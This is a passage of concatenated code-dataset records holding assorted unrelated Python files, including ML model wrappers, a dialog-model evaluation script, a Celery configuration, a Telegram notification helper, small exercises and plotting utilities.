enforcePeriodicBox=system.usesPeriodicBoundaryConditions())\nfor rep in sim.reporters:\n if isinstance(rep, pmd.openmm.RestartReporter):\n rep.report(sim, state)\n","sub_path":"runmd.py","file_name":"runmd.py","file_ext":"py","file_size_in_byte":16930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"404822902","text":"from time import sleep\r\n\r\nfrom bot_utils import click\r\nfrom examples.smt_dx2.images import Images\r\n\r\n\r\n# constants\r\nclass Time:\r\n ui_load = 1.2\r\n processed = 1.8\r\n\r\n\r\ndef get_summon_files(amount=1):\r\n for i in range(amount):\r\n sleep(0.1)\r\n click(Images.exchange_100)\r\n sleep(Time.ui_load)\r\n click(Images.exchange_100)\r\n\r\n sleep(Time.ui_load)\r\n click(Images.close)\r\n\r\n sleep(Time.processed)\r\n\r\n\r\nif __name__ == '__main__':\r\n get_summon_files(20)\r\n","sub_path":"examples/smt_dx2/exchange/fame.py","file_name":"fame.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453409843","text":"from keras.models import Model\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree.export import export_text\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\nclass MVAModel(object):\n def __init__(self, name, binary):\n self.name = name\n self.binary = binary\n self.feature_sets = {}\n\n def add_feature_set(self, feature_set_name, feature_set):\n self.feature_sets[feature_set_name] = feature_set\n\nclass KerasModel(MVAModel):\n def __init__(self, name, arch, batch_size, epochs, loss, optimizer, binary = False):\n super().__init__(name, binary)\n self.architecture = arch\n self.batch_size = batch_size\n self.epochs = epochs\n self.loss = loss\n self.optimizer = optimizer\n self.model = {}\n self.history = {}\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n feature_set = x_train.columns\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n label = self.name+\"_\"+feature_set_name\n inputs, outputs = self.architecture(label=label, input_dim=len(feature_set))\n self.model[feature_set_name] = Model(inputs=inputs, outputs=outputs)\n self.model[feature_set_name].compile(loss=self.loss, optimizer=self.optimizer, metrics=[\"accuracy\"])\n self.model[feature_set_name].summary()\n self.history[feature_set_name] = self.model[feature_set_name].fit(\n x_train,\n y_train,\n epochs=self.epochs,\n batch_size=self.batch_size,\n verbose=1,\n validation_split=0.2,\n shuffle=True)\n self.model[feature_set_name].save('{0}/{1}_{2}.h5'.format(model_dir, prefix, label))\n\n def predict(self, x_test, y_test, feature_set_name):\n if self.binary:\n if \"resweights\" in self.name:\n return self.model[feature_set_name].predict(x_test)[:,0].ravel()\n else:\n return self.model[feature_set_name].predict(x_test).ravel()\n else:\n vbf_pred = self.model[feature_set_name].predict(x_test)[:,0].ravel()\n ggh_pred = self.model[feature_set_name].predict(x_test)[:,1].ravel()\n dy_pred = self.model[feature_set_name].predict(x_test)[:,2].ravel()\n ewk_pred = self.model[feature_set_name].predict(x_test)[:,3].ravel()\n ttbar_pred = self.model[feature_set_name].predict(x_test)[:,4].ravel()\n return [vbf_pred, ggh_pred, dy_pred, ewk_pred, ttbar_pred]\n\n\nclass SklearnBdtModel(MVAModel):\n def __init__(self, name, max_depth, binary):\n super().__init__(name, binary)\n self.model = {}\n self.max_depth = max_depth\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n feature_set = x_train.columns\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n model = DecisionTreeClassifier(random_state=0, max_depth=self.max_depth)\n self.model[feature_set_name] = model.fit(x_train, y_train)\n\n def predict(self, x_test, y_test, feature_set_name):\n return self.model[feature_set_name].predict_proba(x_test)[:,1].ravel()\n\n\nclass TfBdtModel(MVAModel):\n def __init__(self, name, n_trees, max_depth, max_steps, batch_size, tree_complexity, pruning, lr, bpl, weighted=False):\n super().__init__(name, binary=True)\n self.model = {}\n self.n_trees = n_trees\n self.max_depth = max_depth\n self.max_steps = max_steps\n self.batch_size = batch_size\n self.tree_complexity = tree_complexity\n self.weighted = weighted\n self.pruning = pruning\n self.lr = lr\n self.bpl = bpl\n\n def make_input_fn(self, X, y, training=False):\n def input_fn():\n dataset = tf.data.Dataset.from_tensor_slices((X.to_dict(orient='list'), y))\n if training:\n batch_size = self.batch_size\n dataset = dataset.shuffle(batch_size)\n dataset = dataset.repeat(None)\n else:\n batch_size = len(y)\n dataset = dataset.repeat(1)\n dataset = dataset.batch(batch_size)\n return dataset\n return input_fn\n\n\n def train(self, x_train, y_train, feature_set_name, model_dir, prefix, weights=None):\n feature_set = x_train.columns\n self.nsamples = len(y_train)\n print(\"Considering model {0} with feature set {1}\".format(self.name, feature_set_name))\n if feature_set_name not in self.feature_sets.keys():\n self.add_feature_set(feature_set_name, feature_set)\n feature_columns = []\n for feature_name in feature_set:\n feature_columns.append(tf.feature_column.numeric_column(feature_name))\n if self.weighted and (not weights.empty):\n weight_column = tf.feature_column.numeric_column('weight')\n x_train_w = x_train\n x_train_w['weight'] = weights.values\n else:\n weight_column = None\n self.model[feature_set_name] = tf.estimator.BoostedTreesClassifier(feature_columns=feature_columns, \n weight_column=weight_column,\n n_batches_per_layer=self.bpl, \n n_trees=self.n_trees, \n max_depth=self.max_depth,\n learning_rate=self.lr,\n center_bias = True,\n tree_complexity = self.tree_complexity,\n pruning_mode=self.pruning\n )\n\n if (self.weighted) and (not weights.empty):\n self.model[feature_set_name].train(self.make_input_fn(x_train_w, y_train, training=True), max_steps=self.max_steps)\n else:\n self.model[feature_set_name].train(self.make_input_fn(x_train, y_train, training=True), max_steps=self.max_steps)\n\n\n def predict(self, x_test, y_test, feature_set_name):\n\n pred_dicts = list(self.model[feature_set_name].predict(self.make_input_fn(x_test, y_test, training=False), yield_single_examples=False ))\n probs = pd.DataFrame(pred_dicts[0]['probabilities'])\n\n return probs[1].ravel()\n","sub_path":"tests/hmm/mva/mva_models.py","file_name":"mva_models.py","file_ext":"py","file_size_in_byte":7139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588579166","text":"from __future__ import print_function\n\nimport os\nfrom argparse import ArgumentParser\nimport random\nimport sys\nimport json\n\nimport numpy as np\nimport tensorflow as tf\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom modules.entities import EntityTracker\nfrom modules.hierarchical_lstm_v2 import HierarchicalLSTMv2\nfrom modules.actions import ActionTracker\nfrom modules.util import read_dialogs, get_utterances, load_model\nfrom modules.evaluation import evaluate, evaluate_advanced, mark_post_ood_turns\nfrom utils.training_utils import batch_generator\nfrom utils.preprocessing import make_dataset_for_hierarchical_hcn, make_vocabulary, PAD_ID, UNK_ID, BoW_encoder\nfrom babi_tools.ood_augmentation import DEFAULT_CONFIG_FILE\n\nrandom.seed(273)\nnp.random.seed(273)\ntf.set_random_seed(273)\n\nwith open(DEFAULT_CONFIG_FILE) as babi_config_in:\n BABI_CONFIG = json.load(babi_config_in)\n\n\ndef main(in_clean_dataset_folder, in_noisy_dataset_folder, in_model_folder, in_no_ood_evaluation):\n rev_vocab, kb, action_templates, config = load_model(in_model_folder)\n clean_dialogs, clean_indices = read_dialogs(os.path.join(in_clean_dataset_folder, 'dialog-babi-task6-dstc2-tst.txt'),\n with_indices=True)\n noisy_dialogs, noisy_indices = read_dialogs(os.path.join(in_noisy_dataset_folder, 'dialog-babi-task6-dstc2-tst.txt'),\n with_indices=True)\n\n max_noisy_dialog_length = max([item['end'] - item['start'] + 1 for item in noisy_indices])\n config['max_input_length'] = max_noisy_dialog_length\n post_ood_turns_clean, post_ood_turns_noisy = mark_post_ood_turns(noisy_dialogs, BABI_CONFIG['backoff_utterance'].lower())\n\n et = EntityTracker(kb)\n at = ActionTracker(None, et)\n at.set_action_templates(action_templates)\n\n vocab = {word: idx for idx, word in enumerate(rev_vocab)}\n dataset_clean = make_dataset_for_hierarchical_hcn(clean_dialogs,\n clean_indices,\n vocab,\n et,\n at,\n **config)\n dataset_noisy = make_dataset_for_hierarchical_hcn(noisy_dialogs,\n noisy_indices,\n vocab,\n et,\n at,\n **config)\n context_features_clean, action_masks_clean = dataset_clean[1:3]\n net = HierarchicalLSTMv2(config, context_features_clean.shape[-1], action_masks_clean.shape[-1], vocab)\n net.restore(in_model_folder)\n eval_stats_clean = evaluate_advanced(net,\n dataset_clean,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_clean)\n print('Clean dataset: {} turns overall'.format(eval_stats_clean['total_turns']))\n print('Accuracy:')\n accuracy = eval_stats_clean['correct_turns'] / eval_stats_clean['total_turns']\n accuracy_post_ood = eval_stats_clean['correct_post_ood_turns'] / eval_stats_clean['total_post_ood_turns'] \\\n if eval_stats_clean['total_post_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; directly post-OOD: {:.3f}'.format(accuracy, accuracy_post_ood))\n print('Loss : {:.3f}'.format(eval_stats_clean['avg_loss']))\n\n eval_stats_noisy = evaluate_advanced(net,\n dataset_noisy,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_noisy)\n print('\\n\\n')\n print('Noisy dataset: {} turns overall, {} turns after the first OOD'.format(eval_stats_noisy['total_turns'],\n eval_stats_noisy['total_turns_after_ood']))\n print('Accuracy:')\n accuracy = eval_stats_noisy['correct_turns'] / eval_stats_noisy['total_turns']\n accuracy_after_ood = eval_stats_noisy['correct_turns_after_ood'] / eval_stats_noisy['total_turns_after_ood'] \\\n if eval_stats_noisy['total_turns_after_ood'] != 0 \\\n else 0\n accuracy_post_ood = eval_stats_noisy['correct_post_ood_turns'] / eval_stats_noisy['total_post_ood_turns'] \\\n if eval_stats_noisy['total_post_ood_turns'] != 0 \\\n else 0\n accuracy_ood = eval_stats_noisy['correct_ood_turns'] / eval_stats_noisy['total_ood_turns'] \\\n if eval_stats_noisy['total_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; after first OOD: {:.3f}; directly post-OOD: {:.3f}; OOD: {:.3f}'.format(accuracy,\n accuracy_after_ood,\n accuracy_post_ood,\n accuracy_ood))\n print('Loss : {:.3f}'.format(eval_stats_noisy['avg_loss']))\n\n if in_no_ood_evaluation:\n eval_stats_no_ood = evaluate_advanced(net,\n dataset_noisy,\n at.action_templates,\n BABI_CONFIG['backoff_utterance'].lower(),\n post_ood_turns=post_ood_turns_noisy,\n ignore_ood_accuracy=True)\n print('Accuracy (OOD turns ignored):')\n accuracy = eval_stats_no_ood['correct_turns'] / eval_stats_no_ood['total_turns']\n accuracy_after_ood = eval_stats_no_ood['correct_turns_after_ood'] / eval_stats_no_ood['total_turns_after_ood'] \\\n if eval_stats_no_ood['total_turns_after_ood'] != 0 \\\n else 0\n accuracy_post_ood = eval_stats_no_ood['correct_post_ood_turns'] / eval_stats_no_ood['total_post_ood_turns'] \\\n if eval_stats_no_ood['total_post_ood_turns'] != 0 \\\n else 0\n print('overall: {:.3f}; after first OOD: {:.3f}, directly post-OOD: {:.3f}'.format(accuracy, accuracy_after_ood, accuracy_post_ood))\n\n\ndef configure_argument_parser():\n result_parser = ArgumentParser('Evaluate a trained Hybrid Code Network on bAbI Dialog Tasks data')\n result_parser.add_argument('clean_dataset_folder')\n result_parser.add_argument('noisy_dataset_folder')\n result_parser.add_argument('model_folder')\n result_parser.add_argument('--perform_no_ood_eval', default=False, action='store_true')\n return result_parser\n\n\nif __name__ == '__main__':\n parser = configure_argument_parser()\n args = parser.parse_args()\n\n main(args.clean_dataset_folder, args.noisy_dataset_folder, args.model_folder, args.perform_no_ood_eval)\n\n","sub_path":"hcn/__archive/evaluate_hierarchical_hcn_v2.py","file_name":"evaluate_hierarchical_hcn_v2.py","file_ext":"py","file_size_in_byte":7252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"410151865","text":"import requests\n\nfrom config import BOT\n\n\nclass Bot:\n @staticmethod\n def notify(message):\n requests.get(\n 'https://api.telegram.org/%s/sendMessage' % BOT['token'],\n params={'chat_id': BOT['chat'], 'text': message, 'parse_mode': 'HTML'}\n )\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"459525749","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\nfrom celery.schedules import crontab\n\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Timer.settings')\n\napp = Celery('Timer',\n include = ['core.tasks']\n )\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))\n\n\n#\n# CELERY_BROKER_URL = 'amqp://guest:guest@localhost//'\n#\n# #: Only add pickle to this list if your broker is secured\n# #: from unwanted access (see userguide/security.html)\n# CELERY_ACCEPT_CONTENT = ['json']\n# CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'\n# CELERY_TASK_SERIALIZER = 'json'\n\n\"\"\"\nif settings.PROD:\n app.conf.update(\n BROKER_URL='amqp://guest:guest@88.99.142.165:5672/',\n CELERYBEAT_SCHEDULER='django_celery_beat.schedulers:DatabaseScheduler',\n CELERY_RESULT_BACKEND='django-db',\n CELERY_DISABLE_RATE_LIMITS=True,\n CELERY_ACCEPT_CONTENT=['json', ],\n CELERY_TASK_SERIALIZER='json',\n CELERY_RESULT_SERIALIZER='json',\n )\nelse:\n app.conf.update(\n BROKER_URL='amqp://guest:guest@localhost:5672/',\n CELERYBEAT_SCHEDULER='django_celery_beat.schedulers:DatabaseScheduler',\n CELERY_RESULT_BACKEND='django-db',\n CELERY_DISABLE_RATE_LIMITS=True,\n CELERY_ACCEPT_CONTENT=['json', ],\n CELERY_TASK_SERIALIZER='json',\n CELERY_RESULT_SERIALIZER='json',\n )\n\n\"\"\"\n\n\n\napp.conf.beat_schedule = {\n 'last_five_days': {\n 'task': \"core.tasks.ten_days_left\",\n 'schedule': crontab(hour=10, minute=10, day_of_week='mon-sun'),\n },\n 'last_three_days:': {\n 'task': 'core.tasks.five_days_left',\n 'schedule': crontab(hour=10, minute=10, day_of_week='0-6'),\n },\n 'today_payment_day:': {\n 'task': 'core.tasks.today_is_project_day',\n 'schedule': crontab(hour=10, minute=10, day_of_week='mon-sun'),\n },\n \n}\n\n\n ","sub_path":"Timer/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46047719","text":"import math\r\n\r\n\r\ndef calculate_angle(point1, point2):\r\n p1 = (0, 0)\r\n # p2 is now a vector from point1 to point2\r\n p2 = (point2[0]-point1[0], point2[1]-point1[1])\r\n # The math.atan2() method returns a numeric value between -π and π representing the angle theta of an (x, y) point.\r\n ang1 = math.atan2(p1[1], p1[0])\r\n ang2 = math.atan2(p2[1], p2[0])\r\n angle = ((ang2 - ang1) * (180.0 / 3.141592653589793))\r\n # Return only positive angle\r\n if angle < 0:\r\n angle += 360\r\n print(angle)\r\n return angle\r\n\r\n\r\nPoint1 = []\r\nPoint2 = []\r\n\r\nPoint1.append(int(input(\"First point x: \")))\r\nPoint1.append(int(input(\"First point y: \")))\r\nPoint2.append(int(input(\"Second point x: \")))\r\nPoint2.append(int(input(\"Second point y: \")))\r\n\r\nprint(\"Angle between points = \"+str(calculate_angle(Point1,Point2)))","sub_path":"Angle between 2 coordinates in 2D plane/calculate_angle.py","file_name":"calculate_angle.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127343760","text":"#Task 18\r\n#Compulsory Task\r\n\r\n#This program reads the data from the text file called DOB.txt and prints it out in two different sections i.e \"Names\" and \"Birth date\"\r\nFile = open('DOB.txt','r+')\r\n#AllContents = File.read() #read everyting in File DOB\r\nNames = [] #This is a list that will store all the names read from the DOB text file\r\nDOB = [] #This is a list that will store all the DOB's read from the DOB text file\r\nn=1\r\nm=1\r\nfor line in File:\r\n Line = line.strip() # strip any white spaces\r\n Line = line.split() #split the line into pieces\r\n #each line is split into 5 pieces - the first two pieces will be the name and surname while the 3rd,4th and 5th pieces will be the Birth Date\r\n Names.append(Line[0] + \" \" + Line[1]) #Add the first 2 pieces into the Names list.\r\n DOB.append(Line[2] + \" \" + Line[3] + \" \" + Line[4]) #Add the last 3 pieces into the DOB list.\r\n\r\nprint(\"Names:\")\r\nfor i in Names: #print each name in the list on a seperate line\r\n print(\"\\t\" + str(n) + \". \" + i) #i is the same as Names[i] in an array.\r\n n+=1\r\n\r\n\r\nprint(\"\\nBirth Date:\\n\")\r\n#m=1\r\nfor j in DOB:\r\n print(\"\\t\" + str(m) + \". \" + j)\r\n m+=1\r\n\r\n \r\n\r\nFile.close()\r\n","sub_path":"Read from DOB text File.py","file_name":"Read from DOB text File.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"76099127","text":"# 9-12. Multiple Modules: Store the User class in one module, and store the\n# Privileges and Admin classes in a separate module. In a separate file, create\n# an Admin instance and call show_privileges() to show that everything is still\n# working correctly.\n\n\nfrom user_module import User\nfrom privileges_modules import Privileges\nfrom admin_module import Admin\n\nadminKen = Admin('kenneth', 'chang', 'antdoggy', 'k_chang@gmail.com',\n 'taipei')\nadminKen.describe_user()\n\nken_privileges = [\n 'can scrape the entire database',\n 'can delete accounts based on his mood',\n 'can sell user data',\n ]\nadminKen.privileges.privileges = ken_privileges\n\nprint(\"\\nThe Admin \" + adminKen.username + \" has the following privileges: \")\nadminKen.privileges.show_privileges()\n","sub_path":"Chapter-9/9-12tryityourself.py","file_name":"9-12tryityourself.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441570334","text":"import re\n\nstring = 'Some 25/4, Foo 34/56, Bar 56/11'\n\nprint([\n r.groupdict()\n for r in re.finditer(\n r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)',\n string\n )])\n\n_re = re.compile(r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)')\nfor r in _re.finditer(string):\n print(r.groupdict())\n\n_re = re.compile(r'(?P[A-Za-z]+)\\s(?P\\d+)/(?P\\d+)')\n# _re = re.compile(r'([A-Za-z]+)\\s(\\d+)/(\\d+)')\nfor r in _re.finditer(string):\n print(r.group(1), r.group(2), r.group(3))\n print(r.group('street'), r.group('house'), r.group('flat'))\n print('-----------------')\n","sub_path":"classwork/regexp/finditer.py","file_name":"finditer.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622987205","text":"import csv\nimport numpy as np\n\n\ndef create_empty(data_type, size):\n return np.zeros(shape=(size), dtype=data_type)\n\n\ndef process_csv(filename, data, converters, size=10):\n # \"with\" context manager as:\n # 1. it is safer and can avoid errors\n # 2. is generally a better idea to use than opening a file manually\n with open(filename, \"r\") as file:\n # csv module reader as it does a lot of processing for us automatically\n # and is a lot more efficient.\n contents = csv.reader(file)\n\n # next() instead of pop() when working with the csv reader rather than a list\n column_names = next(contents)\n\n # Loop through the data and create starting np.arrays to hold the data\n for d in data:\n data_type = data[d]\n data[d] = create_empty(data_type, size)\n\n\n # Counter to keep track of the number of rows processed\n counter = 0\n\n # Loop through the rows of the data\n for i, values in enumerate(contents):\n\n if len(values) == 0 or len(values) == 1:\n continue\n \n # Check if we have filled all empty spaces in the array, if so\n # add more empties and reset counter\n if counter == size:\n counter = 0\n # Loop through all columns in the data\n for d in data:\n # Create new empty space for each.\n data_type = data[d].dtype\n new_space = create_empty(data_type, size) # Create the new spaces\n extended_array = np.concatenate([data[d], new_space]) # Add the new spaces to the old array\n data[d] = extended_array\n\n # Loop through all column names, check if the column is present in our\n # data structure. If so, apply the converter function and save into the data.\n for name, value in zip(column_names, values):\n if name in data.keys():\n converting_function = converters[name]\n\n converted_value = converting_function(value)\n\n # data[name].append(converted_value)\n \n data[name][i] = converted_value\n \n counter += 1\n\n\n\n\ndata = {\n \"order\": \"int32\",\n \"name\": \"6.3f}s -> (architecture: {}.{}bit, base_addr: 0x{:08x}): {} functions\".format(self.execution_time, self.architecture, self.bitness, self.base_addr, len(self.xcfg))\n","sub_path":"smda/common/SmdaReport.py","file_name":"SmdaReport.py","file_ext":"py","file_size_in_byte":6846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262651740","text":"import keyword\nimport re\n\ndef func_while(l):\n temp = l.replace(\" \",\"\")\n line = temp[0:5]+\" \"+temp[5:]\n if(temp[5] == '('):\n if(temp[-2:] != '):'):\n line = line[:-2] + \"):\"\n elif(temp[-1:] == \":\" and temp[-2:-1] != ')'):\n line = line[:-2] + \"):\"\n elif(temp[-2:-1] == \")\" and temp[5] != \"(\"):\n line = line[:5]+\"(\"+line[5:]\n if(line[-1:] != \":\"):\n line = line + \":\"\n elif(temp[5] != \"(\" and temp[-2:-1] != \")\"):\n if(temp[-1:] != \":\"):\n line = line + \":\"\n return line\n\ndef func_for(l):\n temp = l.replace(\" \",\"\")\n if(\"inrange\" in temp):\n index = temp.index(\"in\")\n if(temp[index+7] != '('):\n temp = temp[:index+7] + \"(\" + temp[index+7:]\n if(temp[-1] != \":\"):\n temp = temp + \":\"\n if(temp[-2] != \")\"):\n temp = temp[:-1] + \"):\"\n temp = \"for \"+temp[3:index] + \" in range \" + temp[index+7:]\n elif(\"in\" in temp):\n index = temp.index(\"in\")\n if(temp[-1] != \":\"):\n temp = temp + \":\"\n temp = \"for \" + temp[3:index] + \" in \" + temp[index+2:]\n return temp\n\ndef func_if(l):\n temp = l.replace(\" \",\"\")\n if(temp[-2:] != \"):\"):\n if(temp[-1] == \":\" and temp[-2] != \")\"):\n temp = temp[:-1] + \"):\"\n elif(temp[-1] != \":\" and temp[-2] == \")\"):\n temp = temp+\":\"\n else:\n temp = temp + \"):\"\n if(l.startswith(\"if\")):\n if(temp[2] != '('):\n temp = temp[:2] + \"(\"+temp[2:]\n elif(l.startswith(\"elif\")):\n if(temp[4] != '('):\n temp = temp[:4] + \"(\"+temp[4:]\n return temp\n\ndef func_else(l):\n temp = l.replace(\" \",\"\")\n if(temp[-1] != \":\"):\n temp = temp+\":\"\n return temp\n\ndef func_def(l):\n first_space = l.find(\" \",4)\n if(l[first_space+1] != '('):\n l.replace(\" \",\"(\",1)\n temp = l.replace(\" \",\"\")\n if(temp[0:3] == \"def\"):\n line = \"def \"+temp[3:]\n if(temp[-1] != \":\"):\n if(temp[-1] != \")\"):\n line = line + \"):\"\n elif(temp[-1] == \")\"):\n line = line + \":\"\n return line\n\ndef func_return(l):\n temp = l.replace(\" \",\"\")\n line = temp[0:6]+\" \"+temp[6:]\n line = \" \"+line\n return line\n\ndef func_print(l):\n temp = l.replace(\" \",\"\")\n word = temp[0:5]\n line = word + \" \" + temp[5:]\n if(len(line) > 6):\n if(line[6:].isalnum()):\n return line\n elif(line[6] == \"\\\"\"):\n if(line[-1] == \"\\'\"):\n line = line[:-1] + \"\\\"\"\n if(line[-1] != \"\\\"\" ):\n line = line + \"\\\"\"\n return line\n\ndef error_correction(lines):\n tab_prefix = 0\n keyword_terms = [\"for\",\"while\",\"if\",\"else\",\"def\"]\n for i in range(len(lines)):\n lines[i] = lines[i].lower()\n a = lines[i].replace(\" \",\"\")\n tab_space = \" \"\n #while loop\n if a.startswith('while'):\n lines[i] = func_while(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #for loop\n elif a.startswith('for'):\n lines[i] = func_for(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #if function\n elif a.startswith('if'):\n lines[i] = func_if(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #elif function\n elif a.startswith('elif'):\n lines[i] = func_if(lines[i])\n tab_prefix -= 1\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #else function\n elif a.startswith('else'):\n lines[i] = func_else(lines[i])\n tab_prefix -= 1\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #def function\n elif a.startswith('def'):\n lines[i] = func_def(lines[i])\n #def return function\n elif a.startswith('return'):\n tab_prefix = 0\n lines[i] = func_return(lines[i])\n #print function\n elif(i != 0):\n if(a.startswith(\"print\")):\n lines[i] = func_print(lines[i])\n if(\" \" in lines[i-1]):\n index = lines[i-1].index(\" \")\n if(lines[i-1][:index] in keyword_terms):\n tab_prefix += 1\n tab=0\n while(tab < tab_prefix):\n lines[i] = \" \"+lines[i]\n tab += 1\n return lines\n\ndef has_operator(line):\n # recognizes operator sanitizes operands, returns line (else return line)\n pass\n\ndef has_fun_call(line):\n # recognizes function call sanitizes parameters, returns line (else return line)\n pass\n","sub_path":"VizCode-Server/errorCorrection.py","file_name":"errorCorrection.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442291419","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport oned_consolidation as oc\n\nres_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1.txt\"\n#res_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1 - mixed.txt\"\n#res_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1 - standard.txt\"\n\nscript_dir = os.path.dirname(os.path.realpath('__file__')) #<-- absolute dir the script is in\nabs_file_path = os.path.join(script_dir + \"\\\\\", res_file_name)\n\nfig = plt.figure()\nplot1 = fig.subplots(1, 1)\nplot1.set_xlabel(\"Time (s)\")\nplot1.set_ylabel(\"Settlement (m)\")\n\n#######################################################################################\nx_data = [];\ny_data = [];\ntime = 0.0\nz = 0.0 # position\nfield_value = 0.0\noutput_pcl_num = 0\nis_init = False\nwith open(abs_file_path, 'r') as res_file:\n while True:\n # time record\n line_text = res_file.readline()\n if not line_text:\n break\n if (\"TotalTime\" in line_text):\n data_start_pos = line_text.find(\"=\") + 1\n time = float(line_text[data_start_pos:-1])\n x_data.append(time)\n elif (\"PointNum\" in line_text):\n data_start_pos = line_text.find(\"=\") + 1\n output_pcl_num = int(line_text[data_start_pos:-1])\n elif (\"*FieldData\" in line_text):\n for i in range(output_pcl_num):\n line_text = res_file.readline()\n line_data = list(map(lambda x: float(x.strip('\\n')), line_text.split(',')))\n if i == output_pcl_num - 1: # particle on top\n field_value = line_data[1] # y\n if not is_init:\n z = line_data[1] # position\n is_init = True\n field_value -= z\n y_data.append(field_value)\n\nline1, = plot1.plot(x_data, y_data)\n\n#################################################################################################\nE = 1000.0\nniu = 0.25 # possion ratio\nEs = (1 - niu) / (1 + niu) / (1 - 2.0*niu) * E # Es = (1-v) / (1 + v) / (1-2v) * E\nkv = 1.0e-4\nmiu = 1.0 # dynamic viscosity\nCv = kv * Es / miu\nu0 = 100.0\nH = 1.0\ncon_res = oc.OneDConsolidation(Cv, Es, u0, H)\n\ntime = 30.0 # time of consolidation\ndata_num = 100\nt_list = np.zeros(data_num + 2)\nu_list = np.zeros(data_num + 2)\nt_list[0] = 0.0\nu_list[0] = 0.0\nt_list[1] = 0.0 # time for equilibrium\nu_list[1] = u_list[0]\nfor i in range(data_num):\n t_list[i + 2] = time * float(i) / float(data_num)\n u_list[i + 2] = con_res.calSettlement(t_list[i + 2])\n t_list[i + 2] += t_list[1]\n\nline2, = plot1.plot(t_list, u_list, 'r--')\n\nplt.legend(handles=[line1,line2], labels=['Explicit MPM', 'Analytical Solution'])\n\nplt.show()\n#plt.savefig('ut - 100 - 2e-5.png')\n\n#os.system(\"pause\")\n","sub_path":"PyUtilities/u_display_2D.py","file_name":"u_display_2D.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82025966","text":"import xml.etree.ElementTree as ET\nimport numpy as np\nfrom torchstat import stat\nfrom nets.CSPdarknet import *\n# D:\\datasets\\voc\\VOCtrainval_06-Nov-2007\\VOCdevkit\\VOC2007\\JPEGImages\\000005.jpg 263,211,324,339,8 165,264,253,372,8 241,194,295,299,8\ndef get_image_annotation(label_path):\n label_list = []\n with open(label_path) as f:\n for line in f.readlines():\n splited_by_space = line.split(' ')\n image_path = splited_by_space[0]\n image_label_dict = {}\n for item in splited_by_space[1:]:\n image_label_dict[image_path] = item\n label_list.append(image_label_dict)\n image_label_dict ={}\n return label_list\n\ndef get_net_stat(model):\n stat(model,(3,608,608))\n\nif __name__ == '__main__':\n x = get_image_annotation('D:\\\\PyCharmSpace\\\\kan\\\\kansgitrepo\\\\yolov4-pytorch\\\\2007_train.txt')\n print(x)\n net = darknet53(False)\n get_net_stat(net)\n\n\n\n\n\n","sub_path":"yolov4-pytorch/model_prune/prune_utils.py","file_name":"prune_utils.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610141678","text":"import tflearn.datasets.oxflower17 as 